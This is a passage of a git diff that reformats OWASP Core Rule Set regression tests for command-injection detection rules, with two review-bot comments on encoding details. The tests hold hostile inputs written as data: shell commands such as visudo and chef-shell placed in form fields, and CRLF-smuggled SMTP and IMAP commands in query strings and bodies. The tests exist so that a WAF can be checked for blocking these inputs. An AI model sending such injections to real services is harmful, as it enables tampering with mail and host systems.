80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-vault -i secret - output: - log_contains: id "932260" - - test_title: 932260-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-vault -i secret + output: + log_contains: id "932260" + - test_id: 40 desc: "Block execution of chef-shell command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: 
"/post" - version: HTTP/1.0 - data: | - code=chef-shell - output: - log_contains: id "932260" - - test_title: 932260-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-shell + output: + log_contains: id "932260" + - test_id: 41 desc: "Block execution chef recipie book" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-run all recipie.rb - output: - log_contains: id "932260" - - test_title: 932260-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-run all recipie.rb + output: + log_contains: id "932260" + - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-client -t 1.1.1.1 - output: - log_contains: id "932260" - - test_title: 932260-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + 
version: HTTP/1.0 + data: | + code=chef-client -t 1.1.1.1 + output: + log_contains: id "932260" + - test_id: 43 desc: "Block execution of visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=visudo - output: - log_contains: id "932260" - - test_title: 932260-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=visudo + output: + log_contains: id "932260" + - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cscli alerts list - output: - log_contains: id "932260" - - test_title: 932260-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cscli alerts list + output: + log_contains: id "932260" + - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: 
HTTP/1.1 - data: | - name=Axel Smith - output: - no_log_contains: id "932260" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.1 + data: | + name=Axel Smith + output: + no_log_contains: id "932260"
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
index 3291d5d9d..286396e92 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
@@ -2,158 +2,148 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases" - enabled: true - name: 932300.yaml +rule_id: 932300 tests: - - test_title: 932300-1 + - test_id: 1 desc: "SMTP MAIL FROM Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20received%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20received%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. 
- version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aEHLO%20test.com" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aEHLO%20test.com" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 6 desc: "SMTP RCPT TO Command 
injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel - version: HTTP/1.0 - output: - no_log_contains: id "932300" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel + version: HTTP/1.0 + output: + no_log_contains: id "932300" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index ce81d351b..b31ecc86d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml 
@@ -2,124 +2,116 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases PL3" - enabled: true - name: 932301.yaml +rule_id: 932301 tests: - - test_title: 932301-1 + - test_id: 1 desc: "SMTP DATA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=%0d%0aDATA" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=%0d%0aDATA" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20need%20that%20data%20now" - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20need%20that%20data%20now" + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20World.%0adata%20not%20found. 
- version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20World.%0adata%20not%20found. + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%20please%20do%20not%20quit - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%20please%20do%20not%20quit + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aHELP%20Postmaster" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-7 + - input: + dest_addr: 127.0.0.1 + headers: + 
Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aHELP%20Postmaster" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20needs%20help%20now - version: HTTP/1.0 - output: - no_log_contains: id "932301" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20needs%20help%20now + version: HTTP/1.0 + output: + no_log_contains: id "932301" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index 347114052..e9e010ae2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml 
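Review bot: Every POST stage in this hunk writes the body as `data: |`, which keeps the trailing newline, so the request body sent is the encoded form field followed by `\n` rather than the bare field. `data: |-` would send exactly the payload shown; if the harness strips the newline anyway, a one-line comment above the first POST stage saying so would save the next reader the check. The same pattern is used in the 932310, 932311, 932320 and 932321 hunks below.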
@@ -2,144 +2,135 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases" - enabled: true - name: 932310.yaml +rule_id: 932310 tests: - - test_title: 932310-1 + - test_id: 1 desc: "IMAP APPEND Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Cannot%20authenticate%20anyways" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Cannot%20authenticate%20anyways" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=The%20uid%20is%020not%020working" - version: HTTP/1.0 - output: - no_log_contains: id "932310" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=The%20uid%20is%020not%020working" + version: HTTP/1.0 + output: + no_log_contains: id "932310" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index e8b31cdb2..841205b7e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml 
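Review bot: The negative test 8 request `uri: "/get?text=The%20uid%20is%020not%020working"` uses `%020`, which decodes to a 0x02 control byte followed by `0`, not a space, so the stage does not send the plain sentence the description names and the false-positive check is weaker than intended. `uri: "/get?text=The%20uid%20is%20not%20working"` is presumably what was meant. The value is carried over unchanged from the old side, so it may be out of scope for a format migration, but it is worth correcting while the file is being rewritten.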
@@ -2,237 +2,223 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases PL3" - enabled: true - name: 932311.yaml +rule_id: 932311 tests: - - test_title: 932311-1 + - test_id: 1 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - X-injection-header: "CREATE:1" - method: GET - port: 80 - uri: "/get?text=We%examine%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + X-injection-header: "CREATE:1" + method: GET + port: 80 + uri: "/get?text=We%examine%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aa002%20copy%202%3A4%20MEETING - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 
